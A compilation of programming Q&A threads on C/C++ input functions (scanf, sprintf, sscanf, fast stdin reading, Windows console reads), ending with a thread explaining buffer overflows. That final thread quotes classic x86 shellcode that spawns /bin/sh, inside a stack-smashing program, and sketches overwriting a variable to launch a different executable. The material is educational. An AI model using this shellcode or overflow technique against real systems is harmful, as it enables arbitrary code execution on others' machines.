Dynamic allocation with scanf() - c++

My question is exactly the same as this one. That is, I'm trying to use scanf() to receive a string of indeterminate length, and I want scanf() to dynamically allocate memory for it.
However, in my situation, I am using VS2010. As far as I can see, MS's scanf() doesn't have an a or m modifier for when scanning for strings. Is there any way to do this (other than receiving input one character at a time)?

Standard versions of scanf() do not allocate memory for any of the variables it reads into.
If you've been hoodwinked into using a non-standard extension in some version of scanf(), you've just had your first lesson in how to write portable code - do not use non-standard extensions. You can nuance that to say "Do not use extensions that are not available on all the platforms of interest to you", but realize that the set of platforms may change over time.

Must you absolutely use scanf ? Aren't std::string s; std::cin >> s; or getline( std::cin, s ); an option for you?

If you want to use scanf you could just allocate a large enough buffer to hold any possible value, say 1024 bytes, then use a maximum field width specifier of 1024.
The m and a are specific non-standard GNU extensions, so thats why Microsofts compiler does not support them. One could wish that visual studio did.
Here is an example using scanf to read settings, and just print them back out:
#include <stdio.h>
#include <errno.h>
#include <malloc.h>
int
main( int argc, char **argv )
{ // usage ./a.out < settings.conf
char *varname;
int value, r, run = 1;
varname = malloc( 1024 );
// clear errno
errno = 0;
while( run )
{ // match any number of "variable = #number" and do some "processing"
// the 1024 here is the maximum field width specifier.
r = scanf ( "%1024s = %d", varname, &value );
if( r == 2 )
{ // matched both string and number
printf( " Variable %s is set to %d \n", varname, value );
} else {
// it did not, either there was an error in which case errno was
// set or we are out of variables to match
if( errno != 0 )
{ // an error has ocurred.
perror("scanf");
}
run = 0;
}
}
return 0;
}
Here is an example settings.conf
cake = 5
three = 3
answertolifeuniverseandeverything = 42
charcoal = -12
You can read more about scanf on the manpages.
And you can of course use getline(), and after that parse character after character.
If you would go into a little more what you are trying to achieve you could maybe get an better answer.

I think, in real world, one need to have some maximum limit on length of user input.
Then you may read the whole line with something like getline(). See http://www.cplusplus.com/reference/iostream/istream/getline/
Note that, if you want multiple input from user, you don't need to have separate char arrays for each of them. You can have one big buffer, e.g. char buffer[2048], for using with getline(), and copy the contents to a suitably allocated (and named) variable, e.g. something like char * name = strdup( buffer ).

Don't use scanf for reading strings. It probably doesn't even do what you think it does; %s reads only up until the next whitespace.

Related

Trouble Understanding sprintf with 'char * str + int'

I was looking at a project and came across the following code and am unable to figure out what the sprintf is doing in this context and was hoping someone might be able to help me figure it out.
char storage[64];
int loc = 0;
int size = 35;
sprintf(storage+(loc),"A"); //Don't know what this does
loc+=1;
sprintf(storage+(loc),"%i", size); //Don't know what this does
loc+=4;
sprintf(storage+(loc), "%i", start); //Don't know what this does
start += size;
loc += 3;
The code later does the following in another part
string value;
int actVal;
int index = 0;
for(int j = index+1; j < index+4; j++)
{
value += storage[j];
}
istringstream iss;
iss.str(value);
iss >> actVal; //Don't understand how this now contains size
The examples I have seen online regarding sprintf never covered that the above code was possible, but the program executes fine. I just can't figure out how the "+loc" affects storage in this instance and how the values would be saved/stored. Any help would be appreciated.
Ugly code! Regardless, for the first part, storage+(loc) == &storage[loc]. You end up with a string "A35\0<unknown_value>1234\0", assuming start = 1234, or in long form:
sprintf(&storage[0],"A");
sprintf(&storage[1],"%i", size);
sprintf(&storage[5], "%i", start);
For the second part, assuming we have the "A35\0<unknown_value>1234\0" above, we get:
value += '3';
value += '5';
value += '\0';
value += '<unknown_value>'; // This might technically be undefined behaviour
So now value = "35". [1]
iss.str(value);
iss >> actVal;
This turns the string into an input stream and reads out the first string representing an integer, "35", and converts it into an integer, giving us basically actVal = atoi(value.c_str());.
Finally, according to this page, yes, reading an uninitialised ("indeterminate value" is the official term) array element is undefined behaviour thus should be avoided.
[1] Note that in a usual implementation, there is a theoretical 10/256 chance that the <unknown_value> could contain an ASCII digit, so value could end up being between 350 and 359, which is obviously not a good outcome and is why one shouldn't ignore undefined behaviour.
The function sprintf() works just like printf(), except the result is not printed in stdout, rather it is store in a string variable. I suggest you read the sprintf() man page carefully:
https://linux.die.net/man/3/sprintf
Even if you are not on a Linux, that function is pretty much similar across different platforms, be it Windows, Mac or other animals. That said, this piece of code you have presented seems to be unnecessarily complicated.
The first part could be written as:
sprintf(storage,"A %i %i", size, start);
For a similar-but-not-equal result, but then again, it all depends on what exactly the original programmer intended this storage area to hold. As Ken pointed out, there are some undefined bytes and behaviors coming from this code as-is.
From the standard:
int sprintf ( char * str, const char * format, ... );
Write formatted data to string
Composes a string with the same text that would be printed if format was used on printf, but instead of being printed, the content is stored as a C string in the buffer pointed by str.
sprintf(storage+(loc),"A");
writes "A" into a buffer called storage. The storage+(loc) is pointer arithmetic. You're specifying which index of the char array you're writing into. So, storage = "A".
sprintf(storage+(loc),"%i", size);
Here you're writing size into storage[1]. Now storage = "A35\0", loc = 1, and so on.
Your final value of storage = "A35\0<garbage><value of start>\0"
actVal: Don't understand how this now contains size
The for loop goes through storage[1] through storage[5], and builds up value using the contents of storage. value contains the string "35\0<garbage>", and iss.str(value) strips it down to "35\0".
iss >> actVal
If you have come across std::cin, it's the same concept. The first string containing an integer value is written into actVal.

Fastest way to read millions of integers from stdin C++?

I am working on a sorting project and I've come to the point where a main bottleneck is reading in the data. It takes my program about 20 seconds to sort 100,000,000 integers read in from stdin using cin and std::ios::sync_with_stdio(false); but it turns out that 10 of those seconds is reading in the data to sort. We do know how many integers we will be reading in (the count is at the top of the file we need to sort).
How can I make this faster? I know it's possible because a student in a previous semester was able to do counting sort in a little over 3 seconds (and that's basically purely read time).
The program is just fed the contents of a file with integers separated by newlines like $ ./program < numstosort.txt
Thanks
Here is the relevant code:
std::ios::sync_with_stdio(false);
int max;
cin >> max;
short num;
short* a = new short[max];
int n = 0;
while(cin >> num) {
a[n] = num;
n++;
}
This will get your data into memory about as fast as possible, assuming Linux/POSIX running on commodity hardware. Note that since you apparently aren't allowed to use compiler optimizations, C++ IO is not going to be the fastest way to read data. As others have noted, without optimizations the C++ code will not run anywhere near as fast as it can.
Given that the redirected file is already open as stdin/STDIN_FILENO, use low-level system call/C-style IO. That won't need to be optimized, as it will run just about as fast as possible:
struct stat sb;
int rc = ::fstat( STDIN_FILENO, &sb );
// use C-style calloc() to get memory that's been
// set to zero as calloc() is often optimized to be
// faster than a new followed by a memset().
char *data = (char *)::calloc( 1, sb.st_size + 1 );
size_t totalRead = 0UL;
while ( totalRead < sb.st_size )
{
ssize_t bytesRead = ::read( STDIN_FILENO,
data + totalRead, sb.st_size - totalRead );
if ( bytesRead <= 0 )
{
break;
}
totalRead += bytesRead;
}
// data is now in memory - start processing it
That code will read your data into memory as one long C-style string. And the lack of compiler optimizations won't matter one bit as it's all almost bare-metal system calls.
Using fstat() to get the file size allows allocating all the needed memory at once - no realloc() or copying data around is necessary.
You'll need to add some error checking, and a more robust version of the code would check to be sure the data returned from fstat() actually is a regular file with an actual size, and not a "useless use of cat" such as cat filename | YourProgram, because in that case the fstat() call won't return a useful file size. You'll need to examine the sb.st_mode field of the struct stat after the call to see what the stdin stream really is:
::fstat( STDIN_FILENO, &sb );
...
if ( S_ISREG( sb.st_mode ) )
{
// regular file...
}
(And for really high-performance systems, it can be important to ensure that the memory pages you're reading data into are actually mapped in your process address space. Performance can really stall if data arrives faster than the kernel's memory management system can create virtual-to-physical mappings for the pages data is getting dumped into.)
To handle a large file as fast as possible, you'd want to go multithreaded, with one thread reading data and feeding one or more data processing threads so you can start processing data before you're done reading it.
Edit: parsing the data.
Again, preventing compiler optimizations probably makes the overhead of C++ operations slower than C-style processing. Based on that assumption, something simple will probably run faster.
This would probably work a lot faster in a non-optimized binary, assuming the data is in a C-style string read in as above:
char *next;
long count = ::strtol( data, &next, 0 );
long *values = new long[ count ];
for ( long ii = 0; ii < count; ii++ )
{
values[ ii ] = ::strtol( next, &next, 0 );
}
That is also very fragile. It relies on strtol() skipping over leading whitespace, meaning if there's anything other than whitespace between the numeric values it will fail. It also relies on the initial count of values being correct. Again - that code will fail if that's not true. And because it can replace the value of next before checking for errors, if it ever goes off the rails because of bad data it'll be hopelessly lost.
But it should be about as fast as possible without allowing compiler optimizations.
That's what crazy about not allowing compiler optimizations. You can write simple, robust C++ code to do all your processing, make use of a good optimizing compiler, and probably run almost as fast as the code I posted - which has no error checking and will fail spectacularly in unexpected and undefined ways if fed unexpected data.
You can make it faster if you use a SolidState hard drive. If you want to ask something about code performance, you need to post how are you doing things in the first place.
You may be able to speed up your program by reading the data into a buffer, then converting the text in the buffer to internal representation.
The thought behind this is that all stream devices like to keep streaming. Starting and stopping the stream wastes time. A block read transfers a lot of data with one transaction.
Although cin is buffered, by using cin.read and a buffer, you can make the buffer a lot bigger than cin uses.
If the data has fixed width fields, there are opportunities to speed up the input and conversion processes.
Edit 1: Example
const unsigned int BUFFER_SIZE = 65536;
char text_buffer[BUFFER_SIZE];
//...
cin.read(text_buffer, BUFFER_SIZE);
//...
int value1;
int arguments_scanned = snscanf(&text_buffer, REMAINING_BUFFER_SIZE,
"%d", &value1);
The tricky part is handling the cases where the text of a number is cut off at the end of the buffer.
Can you ran this little test in compare to your test with and without commented line?
#include <iostream>
#include <cstdlib>
int main()
{
std::ios::sync_with_stdio(false);
char buffer[20] {0,};
int t = 0;
while( std::cin.get(buffer, 20) )
{
// t = std::atoi(buffer);
std::cin.ignore(1);
}
return 0;
}
Pure read test:
#include <iostream>
#include <cstdlib>
int main()
{
std::ios::sync_with_stdio(false);
char buffer[1024*1024];
while( std::cin.read(buffer, 1024*1024) )
{
}
return 0;
}

When to quantify ignored pattern match in the C sscanf function

Cppcheck 1.67 raised a portability issue in my source code at this line:
sscanf(s, "%d%*[,;.]%d", &f, &a);
This is the message I got from it:
scanf without field width limits can crash with huge input data on some versions of libc.
The original intention of the format string was to accept one of three possible limiter chars between two integers, and today - thanks to Cppcheck[1] - I see that %*[,;.] accepts even strings of limiter chars. However I doubt that my format string may cause a crash, because the unlimited part is ignored.
Is there possibly an issue with a buffer overrun? ...maybe behind the scenes?
[1]
How to get lost between farsightedness and blindness:
I tried to fix it by %1*[,;.] (after some API doc), but Cppcheck insisted in the issue, so I also tried %*1[,;.] with the same "success". Seems that I have to suppress it for now...
Congratulations on finding a bug in Cppcheck 1.67 (the current version).
You have basically three workarounds:
Just ignore the false positive.
Rework your format (assign that field, possible as you only want to match one character).
char tmp;
if(3 != sscanf(s, "%d %c%d", &f, &tmp, &a) || tmp!=',' && tmp!=';' && tmp!= '.')
goto error;
Suppress the warning directly (preferably inline-suppressions):
//cppcheck-suppress invalidscanf_libc
if(2 != sscanf(s, "%d%1*[,;.]%d", &f, &a))
goto error;
Don't forget to report the error, as "defect / false positive", so you can retire and forget that workaround as fast as possible.
When to quantify ignored pattern match in the C sscanf function?
Probably it's a good idea to always quantify (see below), but over-quantification may also distract from your intentions. In the above case, where a single separator char has to be skipped, the quantification would definitely be useful.
Is there possibly an issue with a buffer overrun? ...maybe behind the scenes?
There will be no crashes caused by your code. As to deal with the "behind the scenes" question, I experimented with large input strings. In the C library I tested, there was no internal buffer overflow. I tried the C lib that's shipped with Borland C++ 5.6.4 and found that I could not trigger a buffer overrun with large inputs (more than 400 million chars).
Surprisingly, Cppcheck was not totally wrong - there is a portability issue, but a different one:
#include <stdio.h>
#include <assert.h>
#include <sstream>
int traced_sscanf_set(const int count, const bool limited)
{
const char sep = '.';
printf("\n");
std::stringstream ss;
ss << "123" << std::string(count, sep) << "456";
std::string s = ss.str();
printf("string of size %d with %d '%c's in it\n", s.size(), count, sep);
std::stringstream fs;
fs << "%d%";
if (limited) {
fs << count;
}
fs << "*["<< sep << "]%d";
std::string fmt = fs.str();
printf("fmt: \"%s\"\n", fmt.c_str());
int a = 0;
int b = 0;
const sscanfResult = sscanf(s.c_str(), fmt.c_str(), &a, &b);
printf("sscanfResult=%d, a=%d, b=%d\n", sscanfResult, a, b);
return sscanfResult;
}
void test_sscanf()
{
assert(traced_sscanf_set(0x7fff, true)==2);
assert(traced_sscanf_set(0x7fff, false)==2);
assert(traced_sscanf_set(0x8000, true)==2);
assert(traced_sscanf_set(0x8000, false)==1);
}
The library I checked, internally limits the input consumed (and skipped) to 32767 (215-1) chars, if there is no explicitly specified limit in the format parameter.
For those who are interested, here is the trace output:
string of size 32773 with 32767 '.'s in it
fmt: "%d%32767*[.]%d"
sscanfResult=2, a=123, b=456
string of size 32773 with 32767 '.'s in it
fmt: "%d%*[.]%d"
sscanfResult=2, a=123, b=456
string of size 32774 with 32768 '.'s in it
fmt: "%d%32768*[.]%d"
sscanfResult=2, a=123, b=456
string of size 32774 with 32768 '.'s in it
fmt: "%d%*[.]%d"
sscanfResult=1, a=123, b=0

ReadConsoleOutputCharacter gives ERROR_NOT_ENOUGH_MEMORY when requesting more than 0xCFE1 characters, is there a way around that?

the code:
#include <windows.h>
#include <stdio.h>
int main() {
system("mode 128");
int range = 0xCFE2;
char* buf = new char[range+1];
DWORD dwChars;
if (!ReadConsoleOutputCharacter(
GetStdHandle(STD_OUTPUT_HANDLE),
buf, // Buffer where store symbols
range, // Read len chars
{0,0}, // Read from row=8, column=6
&dwChars // How many symbols stored
)) {
printf("GetLastError: %lu\n", GetLastError());
}
system("pause");
return 0;
}
Console screen buffers cannot be larger than 64K. Each character in the buffer requires 2 bytes, one for the character code and another for the color attributes. It therefore never makes any sense to try to read more than 32K chars with ReadConsoleOutputCharacter().
You don't have a real problem.
The documentation for WriteConsole() says:
If the total size of the specified number of characters exceeds the available heap, the function fails with ERROR_NOT_ENOUGH_MEMORY.
ReadConsoleOutputCharacter() probably has a similar restriction if you try to read too much, even though it is not documented. Try using GetConsoleScreenBufferInfo() or similar function to determine how many rows and columns there are, and then don't read more than that.

Can you give an example of a buffer overflow?

I've heard so much about buffer overflows and believe I understand the problem but I still don't see an example of say
char buffer[16];
//code that will over write that buffer and launch notepad.exe
"Smashing The Stack For Fun And Profit" is the best HowTo/FAQ on the subject.
See: http://insecure.org/stf/smashstack.html
Here is a snip of some actual shellcode:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
First, you need a program that will launch other programs. A program that executes OS exec in some form or other. This is highly OS and language-specific.
Second, your program that launches other programs must read from some external source into a buffer.
Third, you must then examine the running program -- as layed out in memory by the compiler -- to see how the input buffer and the other variables used for step 1 (launching other programs) exist.
Fourth, you must concoct an input that will actually overrun the buffer and set the other variables.
So. Part 1 and 2 is a program that looks something like this in C.
#include <someOSstuff>
char buffer[16];
char *program_to_run= "something.exe";
void main( char *args[] ) {
gets( buffer );
exec( program_to_run );
}
Part 3 requires some analysis of what the buffer and the program_to_run look like, but you'll find that it's probably just
\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 s o m e t h i n g . e x e \x00
Part 4, your input, then has to be
1234567890123456notepad.exe\x00
So it will fill buffer and write over program_to_run.
There are two separate things:
The code that overflows a buffer, this is easy to do and will most likely end with a segmentation fault. Which is what has been shown: sprintf(buffer,"01234567890123456789");
The means of putting on the overwritten memory code that it is executed by the operating system. This is harder than merely overflowing a buffer, and is related to how programs are executed. They usually grab the next instruction to execute from a stack, if you manage to put in the next value of the stack a valid instruction via overwriting the memory without creating execution pointer corruption (or any other kind of corruption), you can create an exploit. It is usually done by putting a jump instruction in the next to be read value of the stack to a section of memory which contains code. This is why marking sections of memory as non executable can help against these kind of exploits.
well, i dont know how to launch notpad.exe, but to overwrite this buffer simply do:
sprintf(buffer, "somestringlongerthan16");
int x[10];
x[11] = 1;
gets(buffer);
There is no way to use gets properly, as it doesn't ask for the size of the buffer.
scanf("%s", buffer);
Scanf will read string input until it hits whitespace, it the user types more than 16 characters there will be a buffer overflow.
The way a buffer overflow can be used to make code do something other than intended, is by writing data outside the allocated buffer overwriting something else.
The overwritten data would typically be the code in another function, but a simple example is overwriting a variable next to the buffer:
char buffer[16];
string myapp = "appmine.exe";
void execMe(string s) {
for (int i = 0; i < s.Length; i++) buffer[i] = s[i];
Sys.Execute(myapp, buffer);
}
If you call the function with more data than the buffer can hold, it would overwrite the file name:
execMe("0123456789012345notepad");
Phrack's Smashing The Stack For Fun And Profit has enough explanation to enable you to do what you're asking.
For a simple example see also here:
Protecting Against Some Buffer-Overrun Attacks: An Example Attack
http://www.greenend.org.uk/rjk/random-stack.html